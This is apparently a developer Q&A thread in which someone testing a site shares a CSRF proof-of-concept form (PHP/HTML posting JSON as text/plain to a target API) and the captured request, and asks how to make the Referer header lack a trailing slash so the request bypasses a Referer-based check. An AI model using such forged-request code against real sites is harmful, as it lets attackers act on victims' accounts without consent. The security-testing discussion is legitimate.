# Is it possible to get a http referer header like this format ex: http://example.com

Tags: javascript, php, security, csrf

I am testing a site for security vulnerabilities. I found a CSRF vulnerabilities. The website using http referer header based CSRF protection. Where I found that http referer header can be modified and the server accept the request. But Only in this format.

**Ex: http://example.com**

But when I am trying to exploit the CSRF vulnerability I noticed that browser put http referer header in this format. **Ex: http://example.com/** a extra back slash added into the last of the url.

Here is my CSRF exploit code.

```
<?php
$data = array('groupName' => 'CSRF', 'type' => 'add');
$content = json_encode($data);
?>
<html>
  <body>
    <form action="https://target.com/api" method="POST" enctype="text/plain">
      <input type="text" name="params" value='<?php echo $content; ?>' />
      <input type="submit" value="Submit request" />
      <h1><?php echo $_SERVER['HTTP_REFERER']; ?> </h1>
    </form>
    <a href="">CLICK</a>
  </body>
</html>
```

Http request:

```
POST /api HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.691.400 QQBrowser/9.0.2524.400
Accept: text/html,application/xhtml+xml,application/xml;q=0.9
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/
Cookie: <removed>
Connection: close
Content-Type: text/plain
Content-Length: 52

params={"groupName":"CSRF TEST Done","type":"add"}
```

Is there any way to submit this CSRF exploit with http referer header in following format **Ex:http://example.com**

Comment: Just FYI: Referer is a misspelling of referrer that made its way into the lexicon. Reffer is not a word. Not sure I follow your question. You understand values like that coming form the client can be spoofed. You can't really trust them?

Comment: The referer will always be the complete URL. A URL without `/` is not complete, the browser automatically adds this when the user types an incomplete URL. Why don't you just parse the URL and extract the hostname property, if that's what you want?

Comment: I understand maybe it's not possible to get a referer like this `http://example.com`
I actually want to submit a request to a api with the following referer.